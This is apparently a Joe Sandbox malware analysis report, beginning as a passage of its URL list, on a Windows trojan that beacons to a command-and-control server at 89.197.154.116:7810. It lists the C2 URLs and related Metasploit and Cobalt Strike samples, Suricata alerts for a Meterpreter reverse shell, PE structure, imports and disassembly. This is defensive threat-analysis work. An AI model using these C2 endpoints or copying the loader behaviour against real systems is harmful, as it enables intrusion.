                      https://89.197.154.116:7810/en_US/all.jsomA1E0xfcSNl.exe, 00000000.00000003.2625443691.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2611121723.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2955114449.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2930638048.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2818377539.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2967588825.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2956932174.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2806338031.00000000008CA000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                      https://89.197.154.116:7810/yA1E0xfcSNl.exe, 00000000.00000002.2976844568.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
                        		unknown
                        https://89.197.154.116/A1E0xfcSNl.exe, 00000000.00000002.2976522408.000000000083C000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                        https://89.197.154.116:7810/en_US/all.js-CeA1E0xfcSNl.exe, 00000000.00000003.2039567077.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008C8000.00000004.00000020.00020000.00000000.sdmpfalse
                          		unknown
                          https://89.197.154.116:7810/SXA1E0xfcSNl.exe, 00000000.00000003.2640172153.00000000008F9000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2637205867.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
                            		unknown
                            https://89.197.154.116:7810/en_US/all.jspDataA1E0xfcSNl.exe, 00000000.00000003.2686121048.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
                              		unknown
                              https://89.197.154.116:7810/en_US/all.jsPA1E0xfcSNl.exe, 00000000.00000003.1892702680.00000000008FB000.00000004.00000020.00020000.00000000.sdmpfalse
                                		unknown
                                https://89.197.154.116:7810/en_US/all.jsAA1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		unknown
                                  http://127.0.0.1:%u/A1E0xfcSNl.exe, 00000000.00000002.2976187183.0000000000760000.00000020.00001000.00020000.00000000.sdmpfalse
                                    		unknown
                                    https://89.197.154.116:7810/en_US/all.jsA1E0xfcSNl.exe, 00000000.00000003.2841111103.00000000008C7000.00000004.00000020.00020000.00000000.sdmp, A1E0xfcSNl.exe, 00000000.00000003.2943156877.00000000008CA000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                                    https://89.197.154.116:7810/en_US/all.jsBA1E0xfcSNl.exe, 00000000.00000003.2564095844.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		unknown
                                      https://89.197.154.116:7810/en_US/all.jsKiA1E0xfcSNl.exe, 00000000.00000003.1775591276.00000000008F9000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		unknown
                                        https://89.197.154.116:7810/m/ZA1E0xfcSNl.exe, 00000000.00000003.2733391662.00000000008FA000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		unknown

                                          World Map of Contacted IPs

                                          • No. of IPs < 25%
                                          • 25% < No. of IPs < 50%
                                          • 50% < No. of IPs < 75%
                                          • 75% < No. of IPs

                                          Public IPs

                                          IPDomainCountryFlagASNASN NameMalicious
                                          89.197.154.116
                                          		unknownUnited Kingdom
                                          		47474VIRTUAL1GBtrue

                                          General Information

                                          Joe Sandbox version:41.0.0 Charoite
                                          Analysis ID:1532360
                                          Start date and time:2024-10-13 01:57:05 +02:00
                                          Joe Sandbox product:CloudBasic
                                          Overall analysis duration:0h 5m 49s
                                          Hypervisor based Inspection enabled:false
                                          Report type:full
                                          Cookbook file name:default.jbs
                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                          Number of analysed new started processes analysed:5
                                          Number of new started drivers analysed:0
                                          Number of existing processes analysed:0
                                          Number of existing drivers analysed:0
                                          Number of injected processes analysed:0
                                          Technologies:
                                          • HCA enabled
                                          • EGA enabled
                                          • AMSI enabled
                                          Analysis Mode:default
                                          Sample name:A1E0xfcSNl.exe
                                          renamed because original name is a hash value
                                          Original Sample Name:f05982b55c7a85b9e71a941fe2295848.exe
                                          Detection:MAL
                                          Classification:mal100.troj.evad.winEXE@1/2@0/1
                                          EGA Information:
                                          • Successful, ratio: 100%
                                          HCA Information:
                                          • Successful, ratio: 97%
                                          • Number of executed functions: 15
                                          • Number of non-executed functions: 170
                                          Cookbook Comments:
                                          • Found application associated with file extension: .exe

                                          Warnings

                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                          • Excluded IPs from analysis (whitelisted): 93.184.221.240
                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, ctldl.windowsupdate.com, wu-b-net.trafficmanager.net, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com
                                          • Not all processes where analyzed, report is missing behavior information
                                          • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                          • Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

                                          TimeTypeDescription
                                          19:58:03API Interceptor4051356x Sleep call for process: A1E0xfcSNl.exe modified

                                          Joe Sandbox View / Context

                                          IPs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          89.197.154.116PFqt5aUVdA.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116:7810/PNs7dckO50Y1jTSMUo0osQ1uzlhrQ4w81bBqoiv31D7i0A7iSY6gyr9EVXOB4Zd_KLBxkuuRLlURC5lY_QiFvZl3k3OfdCx3N5d_lJCDWWm3XEqduXYg5vki
                                          CEhM4s0ZoZ.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116:7810/VeM-buvtRWFTY1JiNZ2fGwUXc1CJXgbyOV5zM2vQ03kY7e4nGmyXkTKa8si-g-FfyAlpzs_FKQOSCtulsk34aryu-Ou9W2coAgl4jGnvIFVlgK-MlMyEitlm
                                          P3KxDOMmD3.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/cm
                                          file.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/push
                                          file.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/load
                                          file.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/ptj
                                          file.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/IE9CompatViewList.xml
                                          file.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/pixel
                                          ZnbEj6OQ7e.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/pixel
                                          YpJ4EZPgHX.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116:7810/dpixel

                                          Domains

                                          No context

                                          ASNs

                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                          VIRTUAL1GB7echqQm6T4.vbsGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          21GJhzRNAS.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          bJ7Q5TP1uG.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          Xj6IycX0ji.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          PFqt5aUVdA.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          CEhM4s0ZoZ.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          UJTBFTCNxI.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          0EkK2uIJb6.exeGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116
                                          P3KxDOMmD3.exeGet hashmaliciousCobaltStrikeBrowse
                                          • 89.197.154.116
                                          lNymIO2RVq.vbsGet hashmaliciousMetasploitBrowse
                                          • 89.197.154.116

                                          JA3 Fingerprints

                                          No context

                                          Dropped Files

                                          No context

                                          Created / dropped Files

                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                          Download File
                                          Process:C:\Users\user\Desktop\A1E0xfcSNl.exe
                                          File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                          Category:dropped
                                          Size (bytes):71954
                                          Entropy (8bit):7.996617769952133
                                          Encrypted:true
                                          SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                          MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                          SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                          SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                          SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                          Malicious:false
                                          Reputation:high, very likely benign file
                                          Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

                                          C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                          Download File
                                          Process:C:\Users\user\Desktop\A1E0xfcSNl.exe
                                          File Type:data
                                          Category:modified
                                          Size (bytes):328
                                          Entropy (8bit):3.1295899906525917
                                          Encrypted:false
                                          SSDEEP:6:kKdFkd19UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:1ycDnLNkPlE99SNxAhUe/3
                                          MD5:0970ECCA9A8A6BB348E181666D3E0D9D
                                          SHA1:7BD9E457D4DBA11CDE5D5E8A1753B11E7636DA91
                                          SHA-256:FEA3A69921A8EDD798B221B338EB7B5672AE6CA4C71FB8EDAD0B41BF6CC08700
                                          SHA-512:A707BC57D09386D1607057CE613E1825D8A9309F6AF7941D6C9AE40A2943988A4987AF22DA0F38826D4F822B3DE9CD23DB13C4FF1E55BE97821F1ACEDAF0689F
                                          Malicious:false
                                          Reputation:low
                                          Preview:p...... ........0.......(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

                                          Static File Info

                                          General

                                          File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                          Entropy (8bit):7.300586660063825
                                          TrID:
                                          • Win64 Executable (generic) (12005/4) 74.80%
                                          • Generic Win/DOS Executable (2004/3) 12.49%
                                          • DOS Executable Generic (2002/1) 12.47%
                                          • VXD Driver (31/22) 0.19%
                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
                                          File name:A1E0xfcSNl.exe
                                          File size:328'704 bytes
                                          MD5:f05982b55c7a85b9e71a941fe2295848
                                          SHA1:b0df24778218a422f7a88083c9fb591f0499c36f
                                          SHA256:5462b422de6d759e45cc0269d564acbf0805c4441aba38bd28133c98d1187888
                                          SHA512:e9679915128f46745b05e21964491ee16bb6309d74e18cf6d4cb1259b40aa440f6f1ba1fe87353da9a5fd10cc5ec94e43d7e14e07a5e3cadf9c4b8a12ad30388
                                          SSDEEP:6144:ClFf2d3xRiZ6/32f1RYhG1saU1LQsFtyWHSntMC6pP98WknVyH9RqL84/:qF6BkZWU1RRs/gSU
                                          TLSH:CB64BE8A69C23DA0F98609F690248DFBD3197EFEBCF2D5604F7E8C80958F0D04D5569A
                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d................./...."."....................@..............................p......5-........ ............................

                                          File Icon

                                          Icon Hash:90cececece8e8eb0

                                          Static PE Info

                                          General

                                          Entrypoint:0x4014c0
                                          Entrypoint Section:.text
                                          Digitally signed:false
                                          Imagebase:0x400000
                                          Subsystem:windows gui
                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
                                          DLL Characteristics:
                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                          TLS Callbacks:0x401ba0
                                          CLR (.Net) Version:
                                          OS Version Major:4
                                          OS Version Minor:0
                                          File Version Major:4
                                          File Version Minor:0
                                          Subsystem Version Major:4
                                          Subsystem Version Minor:0
                                          Import Hash:147442e63270e287ed57d33257638324

                                          Entrypoint Preview

                                          Instruction
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov eax, dword ptr [0004EFF5h]
                                          mov dword ptr [eax], 00000001h
                                          call 00007F8CB8C7EB2Fh
                                          call 00007F8CB8C7E31Ah
                                          nop
                                          nop
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop word ptr [eax+eax+00000000h]
                                          nop dword ptr [eax]
                                          dec eax
                                          sub esp, 28h
                                          dec eax
                                          mov eax, dword ptr [0004EFC5h]
                                          mov dword ptr [eax], 00000000h
                                          call 00007F8CB8C7EAFFh
                                          call 00007F8CB8C7E2EAh
                                          nop
                                          nop
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop word ptr [eax+eax+00000000h]
                                          nop dword ptr [eax]
                                          dec eax
                                          sub esp, 28h
                                          call 00007F8CB8C7FFC4h
                                          dec eax
                                          test eax, eax
                                          sete al
                                          movzx eax, al
                                          neg eax
                                          dec eax
                                          add esp, 28h
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          dec eax
                                          lea ecx, dword ptr [00000009h]
                                          jmp 00007F8CB8C7E649h
                                          nop dword ptr [eax+00h]
                                          ret
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          nop
                                          dec eax
                                          jmp ecx
                                          dec eax
                                          arpl word ptr [00002AC2h], ax
                                          test eax, eax
                                          jle 00007F8CB8C7E698h
                                          cmp dword ptr [00002ABBh], 00000000h
                                          jle 00007F8CB8C7E68Fh
                                          dec eax
                                          mov edx, dword ptr [00052CFEh]
                                          dec eax
                                          mov dword ptr [ecx+eax], edx
                                          dec eax
                                          mov edx, dword ptr [00052CFBh]

                                          Data Directories

                                          NameVirtual AddressVirtual Size Is in Section
                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x540000x8d8.idata
                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x510000x2b8.pdata
                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_TLS0x500600x28.rdata
                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_IAT0x542240x1e8.idata
                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                          Sections

                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                          .text0x10000x20a80x2200ba98beafce4128c14539a20f3e854b25False0.5734145220588235data6.010394259460846IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                          .data0x40000x4bcf00x4be0007413092d6d99f07613d3dc3053a5c91False0.624594573723229dBase III DBT, version number 0, next free block index 10, 1st item "\337m\242\335\337m\242\335\337m\242\335\337\206\241\335\257m\242\335\337m\242\335\337m\242\335\337M\241\335\257k\242\335\337m\242\335\337m\242\335\337m\242\335\337m\242\335\337m\242\335\337m\242\335\361\031\307\245\253m\242\335]l\241\335\337}\242\335\337o\241\335\337i\242\335\337m\242\335\337m\242\335\337m\242\335\377m\242\275\361\037\306\274\253\014\242\335\335\221\242\335\337M\241\335\337\223\242\335\337k\241\335\337m\242"7.291570433023368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .rdata0x500000x9100xa005fcc7830b4dcd602b35eeb7f1712e8faFalse0.241796875data4.459688665734325IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                          .pdata0x510000x2b80x400f88aef14dea168f37249daf0dce04c78False0.37890625data3.2311971178670404IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                          .xdata0x520000x2380x4006ce9e303fb86766d702ecb2b174cf348False0.2578125data2.6337753778508075IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
                                          .bss0x530000x9d00x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .idata0x540000x8d80xa003aae8d98b4d34bad008e73a14573bffdFalse0.323828125data3.966749721413537IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .CRT0x550000x680x20052d79e9aecf5d5c3145d3ec54aa197a8False0.0703125data0.2709192282599745IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                          .tls0x560000x100x200bf619eac0cdf3f68d496ea9344137e8bFalse0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                          Imports

                                          DLLImport
                                          KERNEL32.dllCloseHandle, ConnectNamedPipe, CreateFileA, CreateNamedPipeA, CreateThread, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetProcAddress, GetStartupInfoA, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, LeaveCriticalSection, QueryPerformanceCounter, ReadFile, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsGetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, WriteFile
                                          msvcrt.dll__C_specific_handler, __getmainargs, __initenv, __iob_func, __lconv_init, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, free, fwrite, malloc, memcpy, signal, sprintf, strlen, strncmp, vfprintf

                                          Network Behavior

                                          Suricata IDS Alerts

                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                          2024-10-13T01:58:04.664697+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973089.197.154.1167810TCP
                                          2024-10-13T01:58:06.131090+02002035651ET MALWARE Meterpreter or Other Reverse Shell SSL Cert189.197.154.1167810192.168.2.449730TCP
                                          2024-10-13T01:58:07.340142+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973289.197.154.1167810TCP
                                          2024-10-13T01:58:08.669481+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973389.197.154.1167810TCP
                                          2024-10-13T01:58:09.810635+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973489.197.154.1167810TCP
                                          2024-10-13T01:58:11.397010+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973589.197.154.1167810TCP
                                          2024-10-13T01:58:12.724598+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973689.197.154.1167810TCP
                                          2024-10-13T01:58:13.852517+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973789.197.154.1167810TCP
                                          2024-10-13T01:58:14.951902+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973889.197.154.1167810TCP
                                          2024-10-13T01:58:16.066066+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44973989.197.154.1167810TCP
                                          2024-10-13T01:58:17.180337+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974089.197.154.1167810TCP
                                          2024-10-13T01:58:18.280190+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974189.197.154.1167810TCP
                                          2024-10-13T01:58:19.431026+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974489.197.154.1167810TCP
                                          2024-10-13T01:58:20.556703+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974789.197.154.1167810TCP
                                          2024-10-13T01:58:21.683706+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44974989.197.154.1167810TCP
                                          2024-10-13T01:58:22.797263+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975189.197.154.1167810TCP
                                          2024-10-13T01:58:23.921059+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975289.197.154.1167810TCP
                                          2024-10-13T01:58:25.017441+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975389.197.154.1167810TCP
                                          2024-10-13T01:58:26.119867+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975489.197.154.1167810TCP
                                          2024-10-13T01:58:27.219444+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975589.197.154.1167810TCP
                                          2024-10-13T01:58:28.332875+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975689.197.154.1167810TCP
                                          2024-10-13T01:58:29.444176+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975789.197.154.1167810TCP
                                          2024-10-13T01:58:30.572168+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975889.197.154.1167810TCP
                                          2024-10-13T01:58:31.689176+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44975989.197.154.1167810TCP
                                          2024-10-13T01:58:32.799508+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976089.197.154.1167810TCP
                                          2024-10-13T01:58:33.903933+02002028765ET JA3 Hash - [Abuse.ch] Possible Dridex3192.168.2.44976189.197.154.1167810TCP
